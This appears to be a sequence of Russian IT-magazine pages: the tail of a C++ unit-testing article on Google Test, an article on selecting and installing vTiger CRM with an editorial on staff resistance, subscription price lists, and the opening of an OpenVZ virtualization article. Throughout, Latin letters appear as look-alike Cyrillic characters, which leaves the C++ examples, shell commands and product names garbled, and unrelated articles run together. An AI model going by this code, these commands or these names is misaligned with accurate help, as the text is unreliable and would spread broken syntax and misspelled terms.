// Проверить факториал от 0. 

ТЕ5Т(Расіогіа1ТеБі., НапсІІеБІегоІприі) 

{ 

ЕХРЕСТ_Е<г(1, Расіогіа1(0)); 

} 

// Проверить факториал некоторых положительных значений. 
ТЕ5Т(Расіогіа1ТеБі., НапсІІеБРоБІііѵеІприі) 

{ 

ЕХРЕСТ_Е<2(1, Расіогіаі(і)); 

ЕХРЕСТ_Е(2(2, Расіогіа1(2)); 

ЕХРЕСТ_Е(2(6, РасіогіаІ(З)); 

ЕХРЕСТ_Е(2(40320, Расіогіа1(8) ) ; 

} 

В боодіе Тез! также имеются и ГхШге.то есть классы для исполь- 
зования единой конфигурации в несколькихтестах. Такие классы 
являются потомками ::ІезІіпд::ТезІ, у которого имеются методы 8еШр 
и ТеагОоѵѵп для инициализации и освобождения ресурсов соответ- 
ственно. Это очень похоже на то, что мы делали в ТезіЕіхІиге в Сррііпіі. 

Использование макроса : :іѳбііп§: :Тѳбі 

іетріаіе <іурепате Е> // Е - тип элемента 
с1а55 (^иеие 
{ 

риЬІіс : 

(2иеие(); 

ѵоісі Епяиеие(соп5і Е& еіетепі); 

// Возвращает ІМІАЩ если очередь пуста 
Е* Оеяиеие(); 

5І2е Т 5Ііе() сопбі; 

}; 

// Определяем тестовый класс 
сіэбб (ЭиеиеТезі : 

риЬІіс : :іе5ііп§: :Т ѳбі 

{ 

ргоіесіесі : 

ѵігіиаі ѵоісі 5еіІІр() 

{ 



ЯІ_. Епяиеие(І) ; 

Я2_. Епдиеие(2) ; 

Я2_.Епяиеие(3); 

} 

// ѵігіиаі ѵоісі ТеагйоыпО {} 

(2иеие< > 

(2иеие<іпі> ц1_; 

(2иеие<іпі> ц2_; 

}; 

Для создания теста, использующего класс набора данных, нам приго- 
дится макросТЕ8Т_Е(). Аргументы, передаваемыеТЕ8Т_Е, аналогич- 
ны тем, что используются вТЕ8Т(), за единственным исключением 
— имя набора теста должно совпадать с именем тестового класса. 
Главное тутне перепутать ТЕ8Т сТЕ8Т_Е, иначе мы получим ошибки 
на этапе компиляции. 

Использование макроса ТЕ5Т_Р() 

ТЕ5Т_Р((2иеиеТеБЩ ІБЕтріуІпіііаІІу) 

{ 

ЕХРЕСТ_Е(2(0, я0_.5І2е()); 

} 

ТЕ5Т_Р((2иеиеТе5Щ ОеяиеиеІлІогкБ) 

{ 

іпі* п = я0_.Оеяиеие() ; 

ЕХРЕСТ_Е(2(І\ІІЛ_Щ п); 

п = я1_.Оеяиеие(); 

А55ЕКТ_ТКІІЕ(п != ШИ); 

ЕХРЕСТ_Е(2(1, *п) ; 

ЕХРЕСТ_Е(2(0, я1_.5І2е()); 

сіеіеіе п; 



} 

Ну и, наконец, для запуска всех описанныхтестов можно воспользо- 
ваться макросом РІІІ\І_Аи__ТЕ8Т8(). Простота Ѳоодіе Тезі заключает- 
ся в том, что не надо никаких дополнительных движений по добавле- 
нию функций в какие-либо контейнеры и прочее. Все, что описано с 
помощью макросов, выполнится при вызове РШ\І_Аи__ТЕ8Т8. 

Использование макроса КІІІ\І_Аи__ТЕ5Т5() 

іпі таіп(іпі а г§с, сбаг **ап§ѵ) 

{ 

: :іе5ііп§: : ІпііСоо§1еТе5і(&аг§с, аг§ѵ); 
пеіигп КІ)І\І_АІ_І__ТЕ5Т5( ) ; 

} 

Самые ленивые могут не писать свою собственную функцию ппаіп, а 
воспользоваться готовой из гугловского набора. Для этого достаточно 
лишь прилинковать библиотеку дІезІ_таіп. 

Заключение 

Набор фреймворков для юнит-тестов не ограничивается приведен- 
ным мини-списком. Естьеще ВоозіТезІ, СххТезІ, АРІ 8а п ііу Аиіоіезі 
для динамических С/С++ библиотек в II піх- подобных ОС и множество 
других. Описать все их особенности в одной статье просто невоз- 
можно. Главное, чтоутого, кого по-настоящему заинтересует ІІпіі 
Тезіз или разработка через тестирование, всегда будет нормальный 
выбор, т 
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ЗУИ/АСК 



■ ■ Сергей «дгіпсіег» Яремчук ІдгіпсІегШих.іп.иа) 



Охота 

на покупателя 

Выбираем СКМ для своей организации 

В один прекрасный момент начальство решает, что пришло время вести бизнес по-современному, 
вследствие чего нам, айтишникам, необходимо снабдить маркетологов компании эффективным 
инструментом — СКМ. Несмотря на то, что о СКМ говорят давно, и информации, казалось бы, пре- 
достаточно, успешных примеров такого внедрения не так много. Ряд советов помогут тебе обойти 
основные препятствия и не наломать дров. 



Зачем нужен СРМ? 

Система управления взаимодействием с клиентами (СКМ, 
СшЮтег КеІагіопзЫр Мапа^етепі: ЗузГет) — информационная 
система, содержащая базу данных клиентов и историю взаимодей- 
ствия с ними (кто, что и когда купил; а если не купил, то почему; 
новые обращения и так далее) . В итоге, зная все интересы по- 
купателя, можно более эффективно вести с ним дела, подталкивая 
различными способами к дальнейшим приобретениям (напомнив 
об акциях, новых товарах или просто поздравив с днем рождения) . 
Несколько лет назад подобная система считалась уделом круп- 
ных компаний, а выбором и внедрением СКМ занимались, как 
правило, специальные фирмы, предлагающие готовую конфигу- 
рацию. Не всегда предложенное решение удачно состыковывалось 
с бизнес-процессами, хотя после традиционных плясок с бубном 
большинство неувязок обычно удается решить, в том числе и 
научить менеджеров работать с ним. Но сегодня ситуация в корне 
изменилась. На рынке предлагается не один десяток готовых ре- 
шений, имеющих различную функциональность, типы лицензий 
и требования к системе и серверу. Что, с одной стороны, позволяет 
выбрать оптимальное для конкретной организации решение, а с 
другой — как раз таки усложняет выбор. 

Ситуация усложняется еще и тем, что общепринятого стандарта, 
описывающего, каким должен быть функционал СКМ-системы, 
нет. Поэтому под этот термин попадают приложения совершен- 
но разного уровня, от самых простых, имеющих лишь базовую 
функциональность, до навороченных программ с большим количе- 
ством самых разнообразных фич (аналитических, коммутацион- 
ных и прочих) . 

Более продвинутые решения уже далеко отошли от концепции 
вроде «список контактов плюс история взаимоотношений». Сегод- 
ня в СКМ доступны такие функции, как сопровождение заказов, 
аналитика, планирование, отчеты, модули обратной связи, а также 
вспомогательные функции — сканер электронной почты, связь с 
ѴоІР, синхронизация с внешними устройствами и многое другое. 
После первого бума СКМ пришло понимание, что это все-таки не 
панацея, и внедрение такого продукта еще не означает автомати- 
ческое увеличение роста продаж. Особенно это заметно в случае 
низкой квалификации персонала и слабовостребованного рынком 
продукта. Как и любая программа, СКМ — это лишь инструмент, 
реализующий определенную идеологию (в данном случае — 
идеологию взаимоотношений с клиентами), упрощающий сбор 
и последующий анализ информации. Но сама клиентов она не 



принесет. Хотя, с другой стороны, в СКМ использованы лучшие 
наработки по менеджменту, поэтому совсем сбрасывать его со 
счетов не стоит. Нужно лишь помнить, что в процессе внедрения 
возможно придется провести серьезную работу по реорганизации 
большинства бизнес-процессов компании, отказаться от старых 
привычек и приобретать новые навыки. Работники и руководство 
должны четко понимать, зачем внедряется новая система и какие 
преследуются цели. 

Иначе мы получим лишь «улучшенный планировщик» для менед- 
жеров продаж, ведь изначально СКМ большинством пользовате- 
лей воспринимается как «просто еще одна программа». 

Внедрение СКМ имеет еще одну не всем очевидную пользу: защита 
и сохранение данных компании — в частности, данных о клиентах. 
Любой менеджер собирает информацию о клиентах, и если для 
обобщения используется эксель, то в случае перехода менедже- 
ра в другую фирму этот файл «уйдет» вместе с ним. Обычно база 
клиентов — это хлеб менеджера, который кочует из компании в 
компанию. В итоге однажды можно оказаться без базы клиентов. 
СКМ же практически полностью снимает зависимость базы от 
конкретного менеджера, которого можно сместить, перевести или 
уволить. Кстати, они сами это прекрасно понимают, а потому часто 
саботируют новинку. 

Собираем данные а 
для внедрения СРМ 

Внедрение любой информационной системы может быть неудач- 
ным, если изначально не произвести анализ текущей ситуации, 
не разобраться с тем, что уже есть, и, главное, с тем, что ожидается 
получить. Без этого не получится сориентировать персонал и 
правильно подобрать готовое решение. Или внедрение затянется, 
то значит и вложенные в СКМ средства не окупятся за ожидае- 
мый промежуток времени. Каждая организация индивидуальна, 
поэтому все, что срабатывает в одном случае, не обязательно «вы- 
стрелит» в другом. И тем более разные требования будут в фирмах 
разного профиля — продажи, услуги и так далее. 

Поэтому, если принято решение воспользоваться услугами ин- 
тегратора, то следует внимательно присмотреться к его методам 
работы. Если с ходу навязывают готовое решение — от такой 
компании следует держаться подальше. Хотя, в любом случае, 
сторонний интегратор не сможет полностью вникнуть во все сто- 
роны бизнеса, а эффективность СКМ зависит в большей степени от 
специфики менеджмента компании, чем от ІТ. 
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Установка ѵТідег СКАЛ в УЬипІи 10.04 



Пакета с ѵТідег СРМ в репозитарии дистрибутива 
нет. Поэтому админу придется производить установку 
вручную. 

Проект предлагает Ьіп-скрипт, который поможет 
установить все сопутствующие компоненты, в том 
числе и АрасЬе с Му5СН_. В этом случае необходимо 
будет лишь ответить (в основном У или І\І) на 
несколько простых вопросов. В конце получим ссылку 
для входа в Сопбдигабоп ѴѴігагсІ. 

Опытный админ вероятно предпочтет установку при 
помощи сырцов. Это удобней, так как для обновления 
серверов АрасЬе и Му50І_, а также других 
компонентов можно использовать репозитарий 
дистрибутива. В этом случае просто распаковываем 
архив с исходниками ѵТідег СРМ в каталог веб- 
сервера и набираем в браузере нужный ІІРІ_. 

Мастер настройки (Сопбдигабоп ѴѴігагсІ) стандартен 
для такого рода приложений. Самый главный этап — 
проверка параметров (Рге Іпзіаііаііоп СЬеск). Скрипт 
проверит наличие необходимых для работы модулей 
РНР, настройки в рЬр.іпі, а также права доступа 



для некоторых файлов из архива ѵТідег СРМ. Для 
установки в ІІЬипІи вводим (архив распакован в/ѵаг/ 
ѵѵѵѵѵѵМідегсгт): 

$ біісіо ар1:-§е1: іпзііаіі рЬр5-§сІ рЬр5-ітар 
$ біісіо сЬомп ммл/-сІа1:а :ыыы-сІа1:а /ѵаг/ыыы/ 
ѵ1:і§егспт 

На следующем этапе указываем данные для доступа 
к Му5СН_, устанавливаем пароль админа ѵТідег СРМ 
и валюту. Далее визард предлагает выбрать модули. 
Вот и все. Регистрируемся в системе, скачиваем 
модуль русского языка и указываем на файл в меню 
«Эеиіпд -> Мосіи Іе Мападег -> Сизіот Мосіиіез -> 
Ітрогі Ыеѵѵ». 

Не забудь убрать или переименовать файл іпБІаІІ.рЬр 
и каталог іпзіаіі. 

ѵТідег СРМ использует еще ряд компонентов, 
распространяемых под ОрепЭоигсе лицензией. 

Этот объемный список можно получить, запустив 
установочный Ьіп-скрипт. 




По статистике лишь 
10% внедрений СРМ 
признают удачными. 
Внедрение СРМ не 
принесет результата, 
если его не под- 
держат работники 
компании. 



Внедрение своими силами происходит дольше, ведь 
основную работу никто не отменял, но обойдется на 
порядок дешевле, причем даже в том случае, если при- 
дется нанимать стороннего специалиста (например, 
программиста, чтобы связать имеющиеся продукты с 
СКМ). 

Руководить процессом должен кто-то из менеджмента 
компании, поддерживающий идею и понимающий 
конечные цели. Только так соберем именно такую 
систему, которая будет покрывать все потребности. 
Это важный момент: если функциональности не будет 
хватать, или наоборот, если функционал излишен и 
невостребован — значит, усилия и средства потрачены 
зря. На этапе аудита вполне может оказаться, что орга- 
низация не нуждается в полноценном СКМ, а достаточ- 
но 5РА (Эаіез Рогсе АіПотагіоп ЭузГет или 8а1е§ богсе 



тапа^етепі: зузГетз) . Последние, по сути, являются 
СКМ начального уровня и позволяют менеджерам от- 
слеживать контакты клиентов, а руководству — кон- 
тролировать персонал организации. Но сегодня 5РАв 
чистом виде практически не встречаются. 

На предприятии наверняка уже есть некоторое подо- 
бие СКМ — записи на обычной бумаге или в электрон- 
ном виде, базы 1С, Ехсеіитакдалее. Собственно, этот 
факт и вызывает постоянные споры о необходимости 
СКМ. Зачем еще что-то, если все что нужно уже есть и 
его хватает? Тем более, что теперь на пользователя воз- 
лагаются дополнительные обязанности вроде фикса- 
ции звонков, детализации данных и так далее. 

Во время аудита собираем данные о том, в каком виде 
хранится информация о клиентах — если их можно 
импортировать в СКМ, это только упростит процесс 
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Функциональность ѵТідег СКАЛ легко расширить при 
помощи модулей 
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Определение системных установок в Сопіідигаііоп 
ѴѴігагсІ 




Настройки ѵТідег СКМ сгруппированы, разобраться с 
большинством можно без подсказок 



перехода. Используемые почтовые и офисные приложения, веб- 
сайты, софтварные АТС и прочее — все, что пригодится в будущем. 
Например, большинство менеджеров используют ОіПІоок, поэто- 
му импорт контактов (а еще лучше — возможность синхронизации 
данных между СКМ и ОіПІоок) заметно упростит переход. Инте- 
грация с М5 ѴѴогсІ позволит создавать шаблоны документов (вроде 
писем для рассылки) . 

Если менеджеры организации используют мобильные устройства, 
синхронизация с СМ5 также один из обязательных пунктов. 
Изучение имеющихся данных даст понимание того, что уже 
используется, позволит определить структуру информации, 
выделить ответственных за каждый участок и так далее. Также в 
результате сбора данных формируется техзадание, в котором опи- 
сывается, какие данные должны загружаться, какие формируются 
отчеты, требуемая функциональность, процессы взаимодействия 
будущих пользователей с системой и прочее. 

При отсутствии опыта (а когда внедрением занимается сама 
компания, то его нет) очень важное место занимает этап пробной 
эксплуатации. В организации создается группа пользователей 
самого разного уровня, которые, знакомясь с системой (прогоняя 
сквозь нее реальные задания) описывают впечатления и требова- 
ния. Очень хорошо, когда на конечный суд представлено не одно, а 
два-три решения (первичную выборку производит инициативная 
группа, перегружать пользователей не стоит) . 

Причем здесь могут быть варианты. Идеально, когда все участники 
тестовой группы пробуют все предложенные СКМ, но за короткий 



промежуток времени тяжело досконально изучить систему и по- 
лучить объективное впечатление. Поэтому группу можно разде- 
лить, а затем прослушать отчеты обо всех вариантах. Обрабатывая 
полученный результат, принимаем решение о целесообразности 
внедрения СКМ вообще и конкретного решения в частности. 

Выбираем СВЛЛ 

Критерии выбора конкретной реализации СКМ-системы во 
многом зависят от типа бизнеса. Хотя несколько общих моментов, 
о которых хотелось бы сказать, есть. Так как основная функция 
СКМ — это сбор и анализ информации, обязательна возможность 
построения выборки по любым данным, причем обычным пользо- 
вателем, не знающим языка программирования. Чтобы настроить 
действительно гибкий учет всех мелочей, интерфейс СКМ должен 
позволять заводить любое количество новых полей к данным. 

При наличии у организации веб-сайта не лишней будет интегра- 
ция с ним. Посетитель тогда сам будет оставлять свои реквизиты и 
информацию о своих интересах — так можно без лишних усилий 
привлечь себе клиентов. 

Для оптимального выбора СКМ необходимо рассчитать бюджет. 
Причем опыт показывает, что стоимость лицензии является далеко 
не единственным фактором, влияющим на конечную сумму. Здесь 
также следует учитывать затраты на подготовку персонала, воз- 
можное снижение прибыли в переходный момент и так далее. И не 
забываем просчитать средства на приобретение нового сервера, 
лицензию ОС, СУБД и тому подобное. 

Но здесь можно сэкономить, выбрав продукты (в том числе 
саму СКМ) , распространяемые под ОрепЗоигсе лицензиями — 
Ілпих/*В5П, МуВДБ. Небольшим и средним компаниям следует 
обратить внимание на СКМ, реализованные в качестве сервиса 
(5аа5) . Таких решений сегодня предлагается очень много — на- 
пример, ЫеГБике СКМ ( пеігиііе.сот) или Мегаплан ( тедаріап.ги, 
доступен как 5аа$ или в коробочном варианте) . 

В случае 5аа$ продукт приобретается в аренду, а не покупается, и 
может показаться, что это не совсем выгодно. Но на самом деле для 
небольших и средних компаний аренда может иметь ряд положи- 
тельных моментов. Не нужно закупать оборудование, нанимать 
или переобучать админа, заботиться о бэкапе, плюс экономия 
электроэнергии. К тому же защищенность серверов у провайдеров, 
как правило, выше, чем может обеспечить небольшая организа- 
ция. 

ѵТідег СРМ 

Для примера рассмотрим возможности, предоставляемые по- 
пулярной ОрепЗоигсе СКМ системой — ѵТідег СКМ ( ѵіідег.сот) . 
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От редакции 



Воронка продаж 



Александр Лозовский, редактор рубрики «БупАзк» 

Говоря об электронных системах интеграции/автоматизации 
чего-либо, мы концентрируемся на их информационных 
достоинствах — все работает, все в одном месте, все удобно, 
все доступно, все процессы поддаются удаленному контролю 
всех заинтересованных лиц на всех уровнях... Впрочем, Билл 
Гейтс в своей книге «Бизнес со скоростью мысли» еще в 1997 
году нам об этом рассказывал. Прошло четырнадцать лет, и вот 
оказалось, что Биллов Гейтсов на местах работает не так много. 
Ате, кто работают, оказывается... 

...не любят ничего нового: «Я работал N лет, мне и так мало 
платят, и теперь за эти же деньги я должен делать А, В, да еще 
и С!» 

• ...инертны: «Я делаю это в Ехсеі, все нужные мне контакты 
я пишу на клейких бумажках вокруг монитора и в телефонную 
книгу своего смарта, и прекрасно выполняю план. В чем 
проблема?» 

...настроены на сиюминутный результат: «Лучше я обработаю 
N клиентов за считанный час, записывая все на бумажки 
и складывая их в папочку, чем с этой вашей системой, 
заполнением этих ваших (лишних) полей я обработаю в 
полтора раза меньше клиентов и потеряю (в кратковременной 
перспективе) какие-то деньги!». О том, что вся эта информация 
будет полезна в какой-то перспективе, конкретный исполнитель 
думать не будет. 

...работают на себя. Как уже указал Сергей, перед 
перспективой быть незаменимым сотрудником со своими 
незаменимыми контактами мало кто сможет устоять. 

«Подарить» свои контакты компании (да еще и оцифровать 
наработанное за несколько лет работы) мало кто согласится. 

...обладают связями. У разных отделов есть разные 
начальники. Даже если ты — самый большой и прогрессивный 
начальник, который всех поставит перед фактом и обяжет 
перейти в указанные сроки на выбранную систему, может 
оказаться, что начальник отдела X — непростой парень. У 
него связи в Министерстве Ассенизации, его сват — брат 
Помощника Министра, поэтому все твои нововведения он будет 
саботировать (относительно) тихо, но очень эффективно, его 
отдел будет работать с системой с пятого на десятое, продолжая 
записывать все на бумажки и в таблицы, а сделать с ним ты 
ничего не сможешь. Когда внедрение провалится, виноват 
будешь ты. 

Именно поэтому мы советуем тебе: тщательно взвесь 
ожидаемые профиты и предполагаемые риски внедрения 
подобных систем и не забывай про человеческий фактор. 



ориентированной на небольшие и средние организации. Проект 
появился как форк другого проекта 5и§агСКМ (зидагсгпп.сопп) , 
имеющей две версии — открытую и коммерческую. Разработчики 
ѵТі^ег СКМ как раз и задались целью создать аналог, не уступаю- 
щий коммерческому варианту Би^агСКМ. Скептикам сразу скажу, 
что несмотря на бесплатность, за тайгером стоят серьезные орга- 
низации, которые, являясь партнерами, спонсируют и используют 
наработки в собственных целях. Получившееся решение выходит 
за рамки обычной СКМ, обеспечивая организации полный цикл 
пред- и постпродажной деятельности. 

Все данные вводятся как менеджерами, так и самими клиентами 
при помощи веб-интерфейса. Любой из работников компании 



Воронка продаж — термин, используемый экономистами, 
связанными с процессом продаж, и показывающий 
соотношение потенциальных клиентов к реальным. Суть его 
состоит в том, что взаимодействие с клиентом можно разбить 
на несколько этапов: первый контакт -> заинтересованность 
-> убеждение -> наконец, покупка. На каждом шаге часть 
потенциальных клиентов отсеивается, только небольшая часть 
становится реальными покупателями. Визуально это можно 
представить как воронку. Отсюда и термин. 

может получить доступ к самой разнообразной информации о кли- 
енте — за это отвечает более десяти модулей. Например, клиент 
заполняет форму при регистрации во время покупки или в других 
случаях (модуль ѴѴеЪ Рогтз) . 

Специальный модуль «СшЮтег РоіТаІ» обеспечивает обратную 
связь в ходе постпродажного обслуживания. Модуль 8РА удовлет- 
воряет всем требованиям, предъявляемым к такого класса продук- 
там — отслеживание новых контактов, управление полученными 
из разных источников контактами, настраиваемые поля, отчеты (с 
экспортом в М8 Ехсеі или 00 Саіс для дальнейшего анализа), ана- 
лиз воронки продаж, история заказов, счета и так далее. К данным 
клиента можно прикрепить документы (в СКМ встроен конвертер 
в РЭР), электронные сообщения и прочую информацию. 

Для менеджеров реализован планировщик задач, календарь и модуль 
управление проектами (появился в последней версии 5.2.1). Система 
тикетов позволяет отслеживать все обращения в службу поддержки, 
давая возможность поднять уровень обслуживания. Удобно, что 
обращения можно привязать не только к клиенту, но и, например, к 
продукту, собирая попутно данные по качеству товара. База знаний 
позволяет составить ответы на наиболее популярные вопросы. 
Модуль управления запасами дает возможность учитывать това- 
ры, поставщиков, а также создавать прайсы по любой позиции, 
которые затем можно рассылать заинтересованным клиентам. Ряд 
мелочей вроде возможности загрузки изображения товара делают 
работу очень удобной. 

Чтобы информация о клиенте была всегда актуальна, а работа 
сотрудников компании согласованна, в ѵТі^ег СКМ реализован 
целый ряд политик, обеспечивающих участникам возможность 
чтения и редактирования только разрешенной в соответствии с 
уровнем доступа информации. Пятиуровневая модель доступа 
позволяет создать уровни пользователя, группы, профиля, роли и 
организации. Сами пользователи разделены на несколько ролей — 
админ, менеджер продаж, маркетолог, саппорт и снабженец. 




ѵТідег СКМ содержит несколько шаблонов отчетов 
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Информация по сделке с клиентом 

В программе реализован почтовый клиент (возможна работа с 
любым 5МТР/ІМАР сервером, в том числе СМаіІ), чат, К58-фид. 
Доступен модуль интеграции с ѴоІР-сервером АзГегізк. Проект так- 
же предлагает аддоны для работы с Отіоок, М5 ѴѴогб (поддержи- 
вается 2000/2003/2007), расширения для ТЬипбегЬігб и Рігеіох. 
Отдельно стоит отметить появившиеся недавно модули для іРЬопе 
и Апбгокк Плюс несколько десятков расширений различного на- 
значения от сторонних разработчиков. 

При этом ѵТі^ег СКМ является классическим приложением для 
ЬАМР/ѴѴАМР, с установкой и первичной настройкой которого 
может справиться любой админ или веб-программист. То есть ис- 
кать специалиста узкой направленности не придется. Причем для 
установки в Ілпих малоподготовленным пользователем разра- 
ботчики предлагают готовый шелл-скрипт (файл с расширением 
Ьіп), более опытные могут устанавливать из сырцов. 

Системные требования к серверу, на котором будет работать 
ѵТі^ег СКМ, по современным меркам невелики: СРСГ 1.8 Ггц и 512 
Мб КАМ (лучше 2) . 

Поэтому под тайгер можно использовать старый сервер или вир- 
туальную машину, а если продукт приживется, то уже разориться 
на новое железо. 

Но бесплатность ѵТі^ег СКМ имеет и обратную сторону. Достаточ- 
но сложный процесс внедрения полностью зависит от подготовки 
пользователей, которые должны не только изучить ее в работе, но 
и «набить базу». Проект предлагает несколько мануалов, часть из 
которых переведена на русский язык, но их, скорее всего, будет 
недостаточно, поэтому все необходимые рекомендации придется 
разрабатывать самостоятельно. 




Графики в ѵТідег СКМ позволяют наглядно представить 
информацию 

Вывод 

После того как СКМ внедрена, руководство компании должно 
отслеживать ее использование персоналом. Многие сотруд- 
ники поначалу воспринимают новинку лишь как обремени- 
тельную нагрузку, которая реально не дает никакой выгоды. И 
только преодолев этот этап, можно сказать, удалось внедрение 
или нет. ц-ц 
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6 номеров 564 руб. 
13 номеров 1105 руб. 




6 номеров 810 руб. 
12 номеров 1470 руб. 



6 номеров 785 руб. 
12 номеров 1420 руб. 



6 номеров 1110 руб. 
12 номеров 2016 руб. 









6 номеров 1 260 руб. 
1 2 номеров 2200 руб. 



6 номеров 1 260 руб. 
12 номеров 2310 руб. 



6 номеров 900 руб. 
12 номеров 1720 руб. 



6 номеров 1300 руб. 
1 2 номеров 2300 руб. 
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6 номеров 1130 руб. 
1 2 номеров 2060 руб. 



6 номеров 890 руб. 
12 номеров 1630 руб. 



6 номеров 630 руб. 
12 номеров 1130 руб. 



6 номеров 765 руб. 
12 номеров 1380 руб. 







6 номеров 960 руб. 
12 номеров 1740 руб. 



6 номеров 1 300 руб. 
1 2 номеров 2300 руб. 



3 номера 630 руб. 

6 номеров 1140 руб. 



6 номеров 1 260 руб. 
1 2 номеров 2200 руб. 




6 номеров 2205 руб. 
1 2 номеров 3890 руб. 



6 номеров 21 50 руб. 
1 2 номеров 3930 руб. 



6 номеров 2178 руб. 
1 2 номеров 3960 руб. 



(дате)іаіиі 

МЕДИА ДЛЯ ЭНТУЗИАСТОВ 


















ЗУИ/АСК 



■ ■ Евгений Зобнин ІюЬпіпгадтаіІ.сот) 




Виртуальная 
реальность по-русски 

Осваиваем виртуализацию уровня ОС 
на примере ОрегіѴ2 

Виртуализация позволяет сделать работу системного администратора простой и логичной, снизить 
расходы на оборудование и вдохнуть новую жизнь в простаивающие сервера. Но если ты счи- 
таешь, что за все это приходится платить сложностью и запутанностью самой технологии, то эта 
статья как раз для тебя. Я покажу, что поднять сотню-другую виртуальных серверов не сложнее, 
чем настроить среднестатистический ѵѵеЬ-сервер. 



Виртуализация так плотно вошла в нашу жизнь, что уже трудно 
представить себе пользователя, никогда не видевшего виртуальную 
машину собственными глазами. Сегодня виртуализация исполь- 
зуется везде: для создания серверов в хостинг-компаниях, для 
изоляции небезопасных сетевых сервисов, для создания сети тонких 
клиентов, для тестирования программного обеспечения, драйве- 
ров, разработки операционных систем и многого-многого другого. 
Сегодня существует множество технологий виртуализации, среди 
которых есть как простые виртуальные машины, используемые на 
ПК обычных пользователей, так и целые облачные инфраструктуры, 
позволяющие управлять десятками тысяч виртуальных машин, 
разбросанных по всему миру. Особое место среди них занимают так 
называемые «системы виртуализации уровня операционной систе- 
мы» или, как их иногда называют сисадмины, «псевдовиртуальные 
машины». 

Виртуализация уровня ОС 

В отличие от «настоящих» виртуальных машин, которые программ- 
но воссоздают аппаратную начинку ПК, системы виртуализации 
уровня ОС виртуализируют операционную систему, позволяя как бы 
расщепить ее на несколько независимых друг от друга ОС. 

Проще всего понять это на примере дистрибутива СЫи/Ілпих. Грубо 
его можно разделить на два логических компонента: ядро, имеющее 
максимальные привилегии и управляющее всем оборудованием, и 
компоненты пространства пользователя, представляющие собой 
набор демонов, библиотек, систему инициализации, ПО и прочее, 
которые получают доступ к оборудованию через вызовы функций 
ядра (системные вызовы) . В обычной ситуации все компоненты 
пространства пользователя работают в одном «контексте исполне- 
ния» или, говоря образным языком, находятся в одной комнате: они 
могут видеть друг друга, имеют доступ к одному дереву файлов, де- 
лят между собой оборудование и все остальные ресурсы. Использо- 
вание прав доступа позволяет им вполне успешно сосуществовать, 
не нанося друг другу вреда, однако может наступить момент, когда 
кто-то начнет теснить остальных, а другой, найдя способ обхода 
прав доступа, захватит власть над операционной системой. И даже 
если администратор успевает быстро среагировать и устранить 
сбой — коммуналка, в которой у каждого одинаковые права на все, 
не может быть самым удачным способом размещения хоть людей, 
хоть процессов операционной системы. 

Для решения этой проблемы виртуализация уровня ОС позволяет 
создать множество контекстов исполнения, каждый со своим дере- 
вом файлов, собственными процессами, сетевым стеком, правами 



на доступ к оборудованию и так далее. Проще говоря, она делает из 
одной операционной системы — несколько независимых, каждая 
из которых может иметь различные права на ресурсы, наиболее 
подходящие в ее конкретном случае. Такая виртуализация выгодно 
отличается от «настоящих» виртуальных машин: она проще в на- 
стройке, легко масштабируется и накладывает совсем незаметный 
(около 1%) оверхед на скорость работы ОС. Серьезный недостаток 
у нее всего один: возможность исполнения операционных систем 
только одного типа. 

Почему ОрепѴ2? 

В мире ІЖІХ существует много различных реализаций виртуализа- 
ции уровня операционной системы. Одними из первых в свою ОС 
ее внедрили разработчики РгееВВЭ. Система получила название 
Іаіі («Тюрьма») и долгое время оставалась образцом для подража- 
ния в глазах разработчиков других открытых ОС, но в последнее 
время сдала позиции как наименее развитая в плане функциональ- 
ности. 

Наверное, лучшую реализацию системы создала компания 8ип для 
операционной системы Воіагіз 10, однако 5о1агі§ 2опе$, равно как 
и сама ОС, не получила широкого распространения (кстати, мы 
писали о Воіагіз 2опез в одном из предыдущих номеров журнала) . 
Многие разработчики неоднократно предпринимали попытки 
воссоздать обе реализации для Ілпих, и на сегодня в этой области 
сформировалось три заметных лидера. Во-первых, это разви- 
ваемая сообществом система Ілпих-ѴВегѵег (о ней мы также уже 
писали). Во-вторых, это не так давно появившийся, но очень пер- 
спективный проект ЬХС (ІлпиХ Сопіаіпегз), который отличается 
очень функциональной реализацией, а также тем, что использует 
в своей основе стандартные механизмы ядра Ілпих, а потому не 
требует накладывания каких-либо патчей и может быть развернут 
за считанные минуты. В-третьих, это наиболее функциональная и 
стабильная система виртуализации ОрепѴ2, выступающая в роли 
ядра коммерческой системы ѴігШогго, выпускаемой российской 
компанией Рагаііеіз. 

Сегодня ОрепѴ2 и Ѵігіиогго — это стандарт де-факто для систем 
виртуализации уровня ОС в Ілпих. Они используются на тысячах 
серверов по всему миру, а их разработчики находятся на одном из 
первых мест по количеству коммитов кода в ядро Ілпих. Кстати, 
основной плюс ОрепѴ2 заключается в том, что ты всегда сможешь 
найти не только огромное количество других пользователей 
ОрепѴ2, которые ответят на твои вопросы, но и массу информации 
на русском языке. 
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О настройке 
контейнеров 



Самое замечательное в настройке 0репѴ2- 
контейнеров — это целостность инструментов. 

При необходимости система сама изменяет 
конфигурационные файлы дистрибутива, 
расположенного в контейнере, так, чтобы они 
соответствовали запрошенным. К примеру, 
настройка адреса ЭИЗ-сервера с помощью ѵ 2 сН 
автоматически приведет к его добавлению в файл 
/еіс/гезоіѵ.сопі 1 в файловой системе контейнера. 
Такой уровень гибкости гораздо сложнее получить 
при использовании «классических» систем 
виртуализации. 



Список ОрепѴІ-утилит 



• ѵгіізі используется для получения списка всех 
контейнеров; 

• ѵгтідгаіе предназначена для осуществления оі 1 - 
Шпе- и опііпе-миграции; 

• ѵгсбдѵа ІісІа1;е проверяет конфигурационные файлы 
на корректность; 

• Ѵ2плетсбеск, ѵгсрисЬеск, ѵгсаіс осуществляют 
проверку на доступные ресурсы внутри контейнера; 

• Ѵ25р1і1 автоматически генерирует 
конфигурационные файлы; 

• ѵгріб определяет номер контейнера по РЮ’у 
процесса; 

• ѵгдиоіа управляет дисковой квотой контейнера. 




• Файловые системы 
всех контейнеров 



находятся в каталоге 
/ѵаг/ІіЬ/ѵг/ргіѵаіе, их 
можно безболезнен- 
но редактировать, 
не покидая нулевой 
контейнер. 



Что умеет ОрепѴІ? 

По сути, ОрепѴ2 — это модифицированное ядро Ілпих, 
в которое добавлен слой виртуализации, построенный 
на концепции ѴЕ (ѴігШаІ ЕпѵігошпепІ — виртуальной 
среды), которую мы будем называть более привычным 
для нас термином «контейнер». 

Такое ядро может обеспечивать несколько контекстов 
исполнения. И даже если пользователь не собирается 
использовать эту возможность, ядро все равно создаст 
один контекст, называемый Нагбѵѵаге Ыосіе (или нуле- 
вой контейнер) . Это основная хост-система, имеющая 
максимальные полномочия и права на ресурсы. Говоря 
простым языком — стандартное Ілпих- окружение. 

В любой момент администратор нулевого контейнера 
может добавить в систему новый контейнер, назначив 
